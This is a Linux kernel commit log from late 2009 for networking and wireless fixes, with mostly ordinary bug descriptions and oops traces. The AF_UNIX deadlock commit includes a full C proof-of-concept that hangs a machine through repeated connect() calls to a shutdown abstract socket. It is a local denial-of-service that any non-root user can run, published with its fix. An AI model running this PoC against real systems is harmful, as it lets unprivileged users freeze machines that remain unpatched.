03 Nov, 2009

4 commits

  • * git://git.kernel.org/pub/scm/linux/kernel/git/davem/net-2.6: (21 commits)
    mac80211: check interface is down before type change
    cfg80211: fix NULL ptr deref
    libertas if_usb: Fix crash on 64-bit machines
    mac80211: fix reason code output endianness
    mac80211: fix addba timer
    ath9k: fix misplaced semicolon on rate control
    b43: Fix DMA TX bounce buffer copying
    mac80211: fix BSS leak
    rt73usb.c : more ids
    ipw2200: fix oops on missing firmware
    gre: Fix dev_addr clobbering for gretap
    sky2: set carrier off in probe
    net: fix sk_forward_alloc corruption
    pcnet_cs: add cis of PreMax PE-200 ethernet pcmcia card
    r8169: Fix card drop incoming VLAN tagged MTU byte large jumbo frames
    ibmtr: possible Read buffer overflow?
    net: Fix RPF to work with policy routing
    net: fix kmemcheck annotations
    e1000e: rework disable K1 at 1000Mbps for 82577/82578
    e1000e: config PHY via software after resets
    ...

    Linus Torvalds
     
  • David S. Miller
     
  • For some strange reason the netif_running() check
    ended up after the actual type change instead of
    before, potentially causing all kinds of problems
    if the interface is up while changing the type;
    one of the problems manifests itself as a warning:

    WARNING: at net/mac80211/iface.c:651 ieee80211_teardown_sdata+0xda/0x1a0 [mac80211]()
    Hardware name: Aspire one
    Pid: 2596, comm: wpa_supplicant Tainted: G W 2.6.31-10-generic #32-Ubuntu
    Call Trace:
    [] warn_slowpath_common+0x6d/0xa0
    [] warn_slowpath_null+0x15/0x20
    [] ieee80211_teardown_sdata+0xda/0x1a0 [mac80211]
    [] ieee80211_if_change_type+0x4a/0xc0 [mac80211]
    [] ieee80211_change_iface+0x61/0xa0 [mac80211]
    [] cfg80211_wext_siwmode+0xc7/0x120 [cfg80211]
    [] ioctl_standard_call+0x58/0xf0

    (http://www.kerneloops.org/searchweek.php?search=ieee80211_teardown_sdata)

    Cc: Arjan van de Ven
    Cc: stable@kernel.org
    Signed-off-by: Johannes Berg
    Signed-off-by: John W. Linville

    Johannes Berg
     
  • commit 211a4d12abf86fe0df4cd68fc6327cbb58f56f81
    Author: Johannes Berg
    Date: Tue Oct 20 15:08:53 2009 +0900

    cfg80211: sme: deauthenticate on assoc failure

    introduced a potential NULL pointer dereference that
    some people have been hitting for some reason -- the
    params.bssid pointer is not guaranteed to be non-NULL
    for what seems to be a race between various ways of
    reaching the same thing.

    While I'm trying to analyse the problem more let's
    first fix the crash. I think the real fix may be to
    avoid doing _anything_ if it ended up being NULL, but
    right now I'm not sure yet.

    I think
    http://bugzilla.kernel.org/show_bug.cgi?id=14342
    might also be this issue.

    Reported-by: Parag Warudkar
    Tested-by: Parag Warudkar
    Signed-off-by: Johannes Berg
    Signed-off-by: John W. Linville

    Johannes Berg
     

02 Nov, 2009

1 commit

  • The patch below also addresses a couple of other corner cases in readdir
    seen with a large (e.g. 64k) msize. I'm not sure what people think of
    my co-opting of fid->aux here. I'd be happy to rework if there's a better
    way.

    When the size of the user supplied buffer passed to readdir is smaller
    than the data returned in one go by the 9P read request, v9fs_dir_readdir()
    currently discards extra data so that, on the next call, a 9P read
    request will be issued with offset < previous offset + bytes returned,
    which voilates the constraint described in paragraph 3 of read(5) description.
    This patch preseves the leftover data in fid->aux for use in the next call.

    Signed-off-by: Jim Garlick
    Signed-off-by: Eric Van Hensbergen

    Eric Van Hensbergen
     

31 Oct, 2009

5 commits

  • When HT debugging is enabled and we receive a DelBA
    frame we print out the reason code in the wrong byte
    order. Fix that so we don't get weird values printed.

    Signed-off-by: Johannes Berg
    Signed-off-by: John W. Linville

    Johannes Berg
     
  • The addba timer function acquires the sta spinlock,
    but at the same time we try to del_timer_sync() it
    under the spinlock which can produce deadlocks.

    To fix this, always del_timer_sync() the timer in
    ieee80211_process_addba_resp() and add it again
    after checking the conditions, if necessary.

    Signed-off-by: Johannes Berg
    Signed-off-by: John W. Linville

    Johannes Berg
     
  • The IBSS code leaks a BSS struct after telling
    cfg80211 about a given BSS by passing a frame.

    Signed-off-by: Johannes Berg
    Signed-off-by: John W. Linville

    Johannes Berg
     
  • Nathan Neulinger noticed that gretap devices get their MAC address
    from the local IP address, which results in invalid MAC addresses
    half of the time.

    This is because gretap is still using the tunnel netdev ops rather
    than the correct tap netdev ops struct.

    This patch also fixes changelink to not clobber the MAC address
    for the gretap case.

    Signed-off-by: Herbert Xu
    Acked-by: Stephen Hemminger
    Tested-by: Nathan Neulinger
    Signed-off-by: David S. Miller

    Herbert Xu
     
  • On UDP sockets, we must call skb_free_datagram() with socket locked,
    or risk sk_forward_alloc corruption. This requirement is not respected
    in SUNRPC.

    Add a convenient helper, skb_free_datagram_locked() and use it in SUNRPC

    Reported-by: Francis Moreau
    Signed-off-by: Eric Dumazet
    Signed-off-by: David S. Miller

    Eric Dumazet
     

30 Oct, 2009

2 commits

  • Policy routing is not looked up by mark on reverse path filtering.
    This fixes it.

    Signed-off-by: Jamal Hadi Salim
    Signed-off-by: David S. Miller

    jamal
     
  • * git://git.kernel.org/pub/scm/linux/kernel/git/davem/net-2.6: (43 commits)
    net: Fix 'Re: PACKET_TX_RING: packet size is too long'
    netdev: usb: dm9601.c can drive a device not supported yet, add support for it
    qlge: Fix firmware mailbox command timeout.
    qlge: Fix EEH handling.
    AF_RAW: Augment raw_send_hdrinc to expand skb to fit iphdr->ihl (v2)
    bonding: fix a race condition in calls to slave MII ioctls
    virtio-net: fix data corruption with OOM
    sfc: Set ip_summed correctly for page buffers passed to GRO
    cnic: Fix L2CTX_STATUSB_NUM offset in context memory.
    MAINTAINERS: rt2x00 list is moderated
    airo: Reorder tests, check bounds before element
    mac80211: fix for incorrect sequence number on hostapd injected frames
    libertas spi: fix sparse errors
    mac80211: trivial: fix spelling in mesh_hwmp
    cfg80211: sme: deauthenticate on assoc failure
    mac80211: keep auth state when assoc fails
    mac80211: fix ibss joining
    b43: add 'struct b43_wl' missing declaration
    b43: Fix Bugzilla #14181 and the bug from the previous 'fix'
    rt2x00: Fix crypto in TX frame for rt2800usb
    ...

    Linus Torvalds
     

29 Oct, 2009

2 commits

  • Currently PACKET_TX_RING forces certain amount of every frame to remain
    unused. This probably originates from an early version of the
    PACKET_TX_RING patch that in fact used the extra space when the (since
    removed) CONFIG_PACKET_MMAP_ZERO_COPY option was enabled. The current
    code does not make any use of this extra space.

    This patch removes the extra space reservation and lets userspace make
    use of the full frame size.

    Signed-off-by: Gabor Gombas
    Signed-off-by: David S. Miller

    Gabor Gombas
     
  • Augment raw_send_hdrinc to correct for incorrect ip header length values

    A series of oopses was reported to me recently. Apparently when using AF_RAW
    sockets to send data to peers that were reachable via ipsec encapsulation,
    people could panic or BUG halt their systems.

    I've tracked the problem down to user space sending an invalid ip header over an
    AF_RAW socket with IP_HDRINCL set to 1.

    Basically what happens is that userspace sends down an ip frame that includes
    only the header (no data), but sets the ip header ihl value to a large number,
    one that is larger than the total amount of data passed to the sendmsg call. In
    raw_send_hdrincl, we allocate an skb based on the size of the data in the msghdr
    that was passed in, but assume the data is all valid. Later during ipsec
    encapsulation, xfrm4_tranport_output moves the entire frame back in the skbuff
    to provide headroom for the ipsec headers. During this operation, the
    skb->transport_header is repointed to a spot computed by
    skb->network_header + the ip header length (ihl). Since so little data was
    passed in relative to the value of ihl provided by the raw socket, we point
    transport header to an unknown location, resulting in various crashes.

    This fix for this is pretty straightforward, simply validate the value of of
    iph->ihl when sending over a raw socket. If (iph->ihl*4U) > user data buffer
    size, drop the frame and return -EINVAL. I just confirmed this fixes the
    reported crashes.

    Signed-off-by: Neil Horman
    Acked-by: Eric Dumazet
    Signed-off-by: David S. Miller

    Neil Horman
     

28 Oct, 2009

5 commits

  • When hostapd injects a frame, e.g. an authentication or association
    response, mac80211 looks for a suitable access point virtual interface
    to associate the frame with based on its source address. This makes it
    possible e.g. to correctly assign sequence numbers to the frames.

    A small typo in the ethernet address comparison statement caused a
    failure to find a suitable ap interface. Sequence numbers on such
    frames where therefore left unassigned causing some clients
    (especially windows-based 11b/g clients) to reject them and fail to
    authenticate or associate with the access point. This patch fixes the
    typo in the address comparison statement.

    Signed-off-by: Björn Smedman
    Reviewed-by: Johannes Berg
    Cc: stable@kernel.org
    Signed-off-by: John W. Linville

    Björn Smedman
     
  • Fix a typo in the description of hwmp_route_info_get(), no function
    changes.

    Signed-off-by: Andrey Yurovsky
    Signed-off-by: John W. Linville

    Andrey Yurovsky
     
  • When the in-kernel SME gets an association failure from
    the AP we don't deauthenticate, and thus get into a very
    confused state which will lead to warnings later on. Fix
    this by actually deauthenticating when the AP indicates
    an association failure.

    (Brought to you by the hacking session at Kernel Summit 2009 in Tokyo,
    Japan. -- JWL)

    Signed-off-by: Johannes Berg
    Signed-off-by: John W. Linville

    Johannes Berg
     
  • When association fails, we should stay authenticated,
    which in mac80211 is represented by the existence of
    the mlme work struct, so we cannot free that, instead
    we need to just set it to idle.

    (Brought to you by the hacking session at Kernel Summit 2009 in Tokyo,
    Japan. -- JWL)

    Signed-off-by: Johannes Berg
    Signed-off-by: John W. Linville

    Johannes Berg
     
  • Recent commit "mac80211: fix logic error ibss merge bssid check" fixed
    joining of ibss cell when static bssid is provided. In this case
    ifibss->bssid is set before the cell is joined and comparing that address
    to a bss should thus always succeed. Unfortunately this change broke the
    other case of joining a ibss cell without providing a static bssid where
    the value of ifibss->bssid is not set before the cell is joined.

    Since ifibss->bssid may be set before or after joining the cell we do not
    learn anything by comparing it to a known bss. Remove this check.

    Signed-off-by: Reinette Chatre
    Signed-off-by: John W. Linville

    Reinette Chatre
     

24 Oct, 2009

1 commit

  • While playing with pktgen, I realized IP ID was not filled and a
    random value was taken, possibly leaking 2 bytes of kernel memory.

    We can use an increasing ID, this can help diagnostics anyway.

    Also clear packet payload, instead of leaking kernel memory.

    Signed-off-by: Eric Dumazet
    Signed-off-by: David S. Miller

    Eric Dumazet
     

23 Oct, 2009

3 commits

  • Commit b6b39e8f3fbbb (tcp: Try to catch MSG_PEEK bug) added a printk()
    to the WARN_ON() that's in tcp.c. This patch changes this combination
    to WARN(); the advantage of WARN() is that the printk message shows up
    inside the message, so that kerneloops.org will collect the message.

    In addition, this gets rid of an extra if() statement.

    Signed-off-by: Arjan van de Ven
    Signed-off-by: David S. Miller

    Arjan van de Ven
     
  • * git://git.kernel.org/pub/scm/linux/kernel/git/rusty/linux-2.6-for-linus:
    move virtrng_remove to .devexit.text
    move virtballoon_remove to .devexit.text
    virtio_blk: Revert serial number support
    virtio: let header files include virtio_ids.h
    virtio_blk: revert QUEUE_FLAG_VIRT addition

    Linus Torvalds
     
  • * git://git.kernel.org/pub/scm/linux/kernel/git/davem/net-2.6: (21 commits)
    niu: VLAN_ETH_HLEN should be used to make sure that the whole MAC header was copied to the head buffer in the Vlan packets case
    KS8851: Fix ks8851_set_rx_mode() for IFF_MULTICAST
    KS8851: Fix MAC address write order
    KS8851: Add soft reset at probe time
    net: fix section mismatch in fec.c
    net: Fix struct inet_timewait_sock bitfield annotation
    tcp: Try to catch MSG_PEEK bug
    net: Fix IP_MULTICAST_IF
    bluetooth: static lock key fix
    bluetooth: scheduling while atomic bug fix
    tcp: fix TCP_DEFER_ACCEPT retrans calculation
    tcp: reduce SYN-ACK retrans for TCP_DEFER_ACCEPT
    tcp: accept socket after TCP_DEFER_ACCEPT period
    Revert "tcp: fix tcp_defer_accept to consider the timeout"
    AF_UNIX: Fix deadlock on connecting to shutdown socket
    ethoc: clear only pending irqs
    ethoc: inline regs access
    vmxnet3: use dev_dbg, fix build for CONFIG_BLOCK=n
    virtio_net: use dev_kfree_skb_any() in free_old_xmit_skbs()
    be2net: fix support for PCI hot plug
    ...

    Linus Torvalds
     

22 Oct, 2009

1 commit

  • Rusty,

    commit 3ca4f5ca73057a617f9444a91022d7127041970a
    virtio: add virtio IDs file
    moved all device IDs into a single file. While the change itself is
    a very good one, it can break userspace applications. For example
    if a userspace tool wanted to get the ID of virtio_net it used to
    include virtio_net.h. This does no longer work, since virtio_net.h
    does not include virtio_ids.h.
    This patch moves all "#include " from the C
    files into the header files, making the header files compatible with
    the old ones.

    In addition, this patch exports virtio_ids.h to userspace.

    CC: Fernando Luis Vazquez Cao
    Signed-off-by: Christian Borntraeger
    Signed-off-by: Rusty Russell

    Christian Borntraeger
     

20 Oct, 2009

8 commits

  • This patch tries to print out more information when we hit the
    MSG_PEEK bug in tcp_recvmsg. It's been around since at least
    2005 and it's about time that we finally fix it.

    Signed-off-by: Herbert Xu
    Signed-off-by: David S. Miller

    Herbert Xu
     
  • ipv4/ipv6 setsockopt(IP_MULTICAST_IF) have dubious __dev_get_by_index() calls.

    This function should be called only with RTNL or dev_base_lock held, or reader
    could see a corrupt hash chain and eventually enter an endless loop.

    Fix is to call dev_get_by_index()/dev_put().

    If this happens to be performance critical, we could define a new dev_exist_by_index()
    function to avoid touching dev refcount.

    Signed-off-by: Eric Dumazet
    Signed-off-by: David S. Miller

    Eric Dumazet
     
  • When shutdown ppp connection, lockdep waring about non-static key
    will happen, it is caused by the lock is not initialized properly
    at that time.

    Fix with tuning the lock/skb_queue_head init order

    [ 94.339261] INFO: trying to register non-static key.
    [ 94.342509] the code is fine but needs lockdep annotation.
    [ 94.342509] turning off the locking correctness validator.
    [ 94.342509] Pid: 0, comm: swapper Not tainted 2.6.31-mm1 #2
    [ 94.342509] Call Trace:
    [ 94.342509] [] register_lock_class+0x58/0x241
    [ 94.342509] [] ? __lock_acquire+0xb57/0xb73
    [ 94.342509] [] __lock_acquire+0xac/0xb73
    [ 94.342509] [] ? lock_release_non_nested+0x17b/0x1de
    [ 94.342509] [] lock_acquire+0x67/0x84
    [ 94.342509] [] ? skb_dequeue+0x15/0x41
    [ 94.342509] [] _spin_lock_irqsave+0x2f/0x3f
    [ 94.342509] [] ? skb_dequeue+0x15/0x41
    [ 94.342509] [] skb_dequeue+0x15/0x41
    [ 94.342509] [] ? _read_unlock+0x1d/0x20
    [ 94.342509] [] skb_queue_purge+0x14/0x1b
    [ 94.342509] [] l2cap_recv_frame+0xea1/0x115a [l2cap]
    [ 94.342509] [] ? __lock_acquire+0xb57/0xb73
    [ 94.342509] [] ? mark_lock+0x1e/0x1c7
    [ 94.342509] [] ? hci_rx_task+0xd2/0x1bc [bluetooth]
    [ 94.342509] [] l2cap_recv_acldata+0xb1/0x1c6 [l2cap]
    [ 94.342509] [] hci_rx_task+0x106/0x1bc [bluetooth]
    [ 94.342509] [] ? l2cap_recv_acldata+0x0/0x1c6 [l2cap]
    [ 94.342509] [] tasklet_action+0x69/0xc1
    [ 94.342509] [] __do_softirq+0x94/0x11e
    [ 94.342509] [] do_softirq+0x36/0x5a
    [ 94.342509] [] irq_exit+0x35/0x68
    [ 94.342509] [] do_IRQ+0x72/0x89
    [ 94.342509] [] common_interrupt+0x2e/0x34
    [ 94.342509] [] ? pm_qos_add_requirement+0x63/0x9d
    [ 94.342509] [] ? acpi_idle_enter_bm+0x209/0x238
    [ 94.342509] [] cpuidle_idle_call+0x5c/0x94
    [ 94.342509] [] cpu_idle+0x4e/0x6f
    [ 94.342509] [] rest_init+0x53/0x55
    [ 94.342509] [] start_kernel+0x2f0/0x2f5
    [ 94.342509] [] i386_start_kernel+0x91/0x96

    Reported-by: Oliver Hartkopp
    Signed-off-by: Dave Young
    Tested-by: Oliver Hartkopp
    Signed-off-by: David S. Miller

    Dave Young
     
  • Due to driver core changes dev_set_drvdata will call kzalloc which should be
    in might_sleep context, but hci_conn_add will be called in atomic context

    Like dev_set_name move dev_set_drvdata to work queue function.

    oops as following:

    Oct 2 17:41:59 darkstar kernel: [ 438.001341] BUG: sleeping function called from invalid context at mm/slqb.c:1546
    Oct 2 17:41:59 darkstar kernel: [ 438.001345] in_atomic(): 1, irqs_disabled(): 0, pid: 2133, name: sdptool
    Oct 2 17:41:59 darkstar kernel: [ 438.001348] 2 locks held by sdptool/2133:
    Oct 2 17:41:59 darkstar kernel: [ 438.001350] #0: (sk_lock-AF_BLUETOOTH-BTPROTO_L2CAP){+.+.+.}, at: [] lock_sock+0xa/0xc [l2cap]
    Oct 2 17:41:59 darkstar kernel: [ 438.001360] #1: (&hdev->lock){+.-.+.}, at: [] l2cap_sock_connect+0x103/0x26b [l2cap]
    Oct 2 17:41:59 darkstar kernel: [ 438.001371] Pid: 2133, comm: sdptool Not tainted 2.6.31-mm1 #2
    Oct 2 17:41:59 darkstar kernel: [ 438.001373] Call Trace:
    Oct 2 17:41:59 darkstar kernel: [ 438.001381] [] __might_sleep+0xde/0xe5
    Oct 2 17:41:59 darkstar kernel: [ 438.001386] [] __kmalloc+0x4a/0x15a
    Oct 2 17:41:59 darkstar kernel: [ 438.001392] [] ? kzalloc+0xb/0xd
    Oct 2 17:41:59 darkstar kernel: [ 438.001396] [] kzalloc+0xb/0xd
    Oct 2 17:41:59 darkstar kernel: [ 438.001400] [] device_private_init+0x15/0x3d
    Oct 2 17:41:59 darkstar kernel: [ 438.001405] [] dev_set_drvdata+0x18/0x26
    Oct 2 17:41:59 darkstar kernel: [ 438.001414] [] hci_conn_init_sysfs+0x40/0xd9 [bluetooth]
    Oct 2 17:41:59 darkstar kernel: [ 438.001422] [] ? hci_conn_add+0x128/0x186 [bluetooth]
    Oct 2 17:41:59 darkstar kernel: [ 438.001429] [] hci_conn_add+0x177/0x186 [bluetooth]
    Oct 2 17:41:59 darkstar kernel: [ 438.001437] [] hci_connect+0x3c/0xfb [bluetooth]
    Oct 2 17:41:59 darkstar kernel: [ 438.001442] [] l2cap_sock_connect+0x174/0x26b [l2cap]
    Oct 2 17:41:59 darkstar kernel: [ 438.001448] [] sys_connect+0x60/0x7a
    Oct 2 17:41:59 darkstar kernel: [ 438.001453] [] ? lock_release_non_nested+0x84/0x1de
    Oct 2 17:41:59 darkstar kernel: [ 438.001458] [] ? might_fault+0x47/0x81
    Oct 2 17:41:59 darkstar kernel: [ 438.001462] [] ? might_fault+0x47/0x81
    Oct 2 17:41:59 darkstar kernel: [ 438.001468] [] ? __copy_from_user_ll+0x11/0xce
    Oct 2 17:41:59 darkstar kernel: [ 438.001472] [] sys_socketcall+0x82/0x17b
    Oct 2 17:41:59 darkstar kernel: [ 438.001477] [] syscall_call+0x7/0xb

    Signed-off-by: Dave Young
    Signed-off-by: David S. Miller

    Dave Young
     
  • Fix TCP_DEFER_ACCEPT conversion between seconds and
    retransmission to match the TCP SYN-ACK retransmission periods
    because the time is converted to such retransmissions. The old
    algorithm selects one more retransmission in some cases. Allow
    up to 255 retransmissions.

    Signed-off-by: Julian Anastasov
    Acked-by: Eric Dumazet
    Signed-off-by: David S. Miller

    Julian Anastasov
     
  • Change SYN-ACK retransmitting code for the TCP_DEFER_ACCEPT
    users to not retransmit SYN-ACKs during the deferring period if
    ACK from client was received. The goal is to reduce traffic
    during the deferring period. When the period is finished
    we continue with sending SYN-ACKs (at least one) but this time
    any traffic from client will change the request to established
    socket allowing application to terminate it properly.
    Also, do not drop acked request if sending of SYN-ACK fails.

    Signed-off-by: Julian Anastasov
    Acked-by: Eric Dumazet
    Signed-off-by: David S. Miller

    Julian Anastasov
     
  • Willy Tarreau and many other folks in recent years
    were concerned what happens when the TCP_DEFER_ACCEPT period
    expires for clients which sent ACK packet. They prefer clients
    that actively resend ACK on our SYN-ACK retransmissions to be
    converted from open requests to sockets and queued to the
    listener for accepting after the deferring period is finished.
    Then application server can decide to wait longer for data
    or to properly terminate the connection with FIN if read()
    returns EAGAIN which is an indication for accepting after
    the deferring period. This change still can have side effects
    for applications that expect always to see data on the accepted
    socket. Others can be prepared to work in both modes (with or
    without TCP_DEFER_ACCEPT period) and their data processing can
    ignore the read=EAGAIN notification and to allocate resources for
    clients which proved to have no data to send during the deferring
    period. OTOH, servers that use TCP_DEFER_ACCEPT=1 as flag (not
    as a timeout) to wait for data will notice clients that didn't
    send data for 3 seconds but that still resend ACKs.
    Thanks to Willy Tarreau for the initial idea and to
    Eric Dumazet for the review and testing the change.

    Signed-off-by: Julian Anastasov
    Acked-by: Eric Dumazet
    Signed-off-by: David S. Miller

    Julian Anastasov
     
  • This reverts commit 6d01a026b7d3009a418326bdcf313503a314f1ea.

    Julian Anastasov, Willy Tarreau and Eric Dumazet have come up
    with a more correct way to deal with this.

    Signed-off-by: David S. Miller

    David S. Miller
     

19 Oct, 2009

1 commit

  • I found a deadlock bug in UNIX domain socket, which makes able to DoS
    attack against the local machine by non-root users.

    How to reproduce:
    1. Make a listening AF_UNIX/SOCK_STREAM socket with an abstruct
    namespace(*), and shutdown(2) it.
    2. Repeat connect(2)ing to the listening socket from the other sockets
    until the connection backlog is full-filled.
    3. connect(2) takes the CPU forever. If every core is taken, the
    system hangs.

    PoC code: (Run as many times as cores on SMP machines.)

    int main(void)
    {
    int ret;
    int csd;
    int lsd;
    struct sockaddr_un sun;

    /* make an abstruct name address (*) */
    memset(&sun, 0, sizeof(sun));
    sun.sun_family = PF_UNIX;
    sprintf(&sun.sun_path[1], "%d", getpid());

    /* create the listening socket and shutdown */
    lsd = socket(AF_UNIX, SOCK_STREAM, 0);
    bind(lsd, (struct sockaddr *)&sun, sizeof(sun));
    listen(lsd, 1);
    shutdown(lsd, SHUT_RDWR);

    /* connect loop */
    alarm(15); /* forcely exit the loop after 15 sec */
    for (;;) {
    csd = socket(AF_UNIX, SOCK_STREAM, 0);
    ret = connect(csd, (struct sockaddr *)&sun, sizeof(sun));
    if (-1 == ret) {
    perror("connect()");
    break;
    }
    puts("Connection OK");
    }
    return 0;
    }

    (*) Make sun_path[0] = 0 to use the abstruct namespace.
    If a file-based socket is used, the system doesn't deadlock because
    of context switches in the file system layer.

    Why this happens:
    Error checks between unix_socket_connect() and unix_wait_for_peer() are
    inconsistent. The former calls the latter to wait until the backlog is
    processed. Despite the latter returns without doing anything when the
    socket is shutdown, the former doesn't check the shutdown state and
    just retries calling the latter forever.

    Patch:
    The patch below adds shutdown check into unix_socket_connect(), so
    connect(2) to the shutdown socket will return -ECONREFUSED.

    Signed-off-by: Tomoki Sekiyama
    Signed-off-by: Masanori Yoshida
    Signed-off-by: David S. Miller

    Tomoki Sekiyama
     

16 Oct, 2009

1 commit

  • * git://git.kernel.org/pub/scm/linux/kernel/git/davem/net-2.6: (53 commits)
    vmxnet: fix 2 build problems
    net: add support for STMicroelectronics Ethernet controllers.
    net: ks8851_mll uses mii interfaces
    net/fec_mpc52xx: Fix kernel panic on FEC error
    net: Fix OF platform drivers coldplug/hotplug when compiled as modules
    TI DaVinci EMAC: Clear statistics register properly.
    r8169: partial support and phy init for the 8168d
    irda/sa1100_ir: check return value of startup hook
    udp: Fix udp_poll() and ioctl()
    WAN: fix Cisco HDLC handshaking.
    tcp: fix tcp_defer_accept to consider the timeout
    3c574_cs: spin_lock the set_multicast_list function
    net: Teach pegasus driver to ignore bluetoother adapters with clashing Vendor:Product IDs
    netxen: fix pci bar mapping
    ethoc: fix warning from 32bit build
    libertas: fix build
    net: VMware virtual Ethernet NIC driver: vmxnet3
    net: Fix IXP 2000 network driver building.
    libertas: fix build
    mac80211: document ieee80211_rx() context requirement
    ...

    Linus Torvalds
     

14 Oct, 2009

1 commit


13 Oct, 2009

5 commits

  • udp_poll() can in some circumstances drop frames with incorrect checksums.

    Problem is we now have to lock the socket while dropping frames, or risk
    sk_forward corruption.

    This bug is present since commit 95766fff6b9a78d1
    ([UDP]: Add memory accounting.)

    While we are at it, we can correct ioctl(SIOCINQ) to also drop bad frames.

    Signed-off-by: Eric Dumazet
    Signed-off-by: David S. Miller

    Eric Dumazet
     
  • I was trying to use TCP_DEFER_ACCEPT and noticed that if the
    client does not talk, the connection is never accepted and
    remains in SYN_RECV state until the retransmits expire, where
    it finally is deleted. This is bad when some firewall such as
    netfilter sits between the client and the server because the
    firewall sees the connection in ESTABLISHED state while the
    server will finally silently drop it without sending an RST.

    This behaviour contradicts the man page which says it should
    wait only for some time :

    TCP_DEFER_ACCEPT (since Linux 2.4)
    Allows a listener to be awakened only when data arrives
    on the socket. Takes an integer value (seconds), this
    can bound the maximum number of attempts TCP will
    make to complete the connection. This option should not
    be used in code intended to be portable.

    Also, looking at ipv4/tcp.c, a retransmit counter is correctly
    computed :

    case TCP_DEFER_ACCEPT:
    icsk->icsk_accept_queue.rskq_defer_accept = 0;
    if (val > 0) {
    /* Translate value in seconds to number of
    * retransmits */
    while (icsk->icsk_accept_queue.rskq_defer_accept < 32 &&
    val > ((TCP_TIMEOUT_INIT / HZ) <<
    icsk->icsk_accept_queue.rskq_defer_accept))
    icsk->icsk_accept_queue.rskq_defer_accept++;
    icsk->icsk_accept_queue.rskq_defer_accept++;
    }
    break;

    ==> rskq_defer_accept is used as a counter of retransmits.

    But in tcp_minisocks.c, this counter is only checked. And in
    fact, I have found no location which updates it. So I think
    that what was intended was to decrease it in tcp_minisocks
    whenever it is checked, which the trivial patch below does.

    Signed-off-by: Willy Tarreau
    Signed-off-by: David S. Miller

    Willy Tarreau
     
  • ieee80211_rx() must be called with softirqs disabled
    since the networking stack requires this for netif_rx()
    and some code in mac80211 can assume that it can not
    be processing its own tasklet and this call at the same
    time.

    It may be possible to remove this requirement after a
    careful audit of mac80211 and doing any needed locking
    improvements in it along with disabling softirqs around
    netif_rx(). An alternative might be to push all packet
    processing to process context in mac80211, instead of
    to the tasklet, and add other synchronisation.

    Signed-off-by: Johannes Berg
    Signed-off-by: John W. Linville

    Johannes Berg
     
  • When a scan completes, we call ieee80211_sta_find_ibss(),
    which is also called from other places. When the scan was
    done in software, there's no problem as both run from the
    single-threaded mac80211 workqueue and are thus serialised
    against each other, but with hardware scan the completion
    can be in a different context and race against callers of
    this function from the workqueue (e.g. due to beacon RX).
    So instead of calling ieee80211_sta_find_ibss() directly,
    just arm the timer and have it fire, scheduling the work,
    which will invoke ieee80211_sta_find_ibss() (if that is
    appropriate in the current state).

    Signed-off-by: Johannes Berg
    Signed-off-by: John W. Linville

    Johannes Berg
     
  • Signed-off-by: Felix Fietkau
    Acked-by: Johannes Berg
    Signed-off-by: John W. Linville

    Felix Fietkau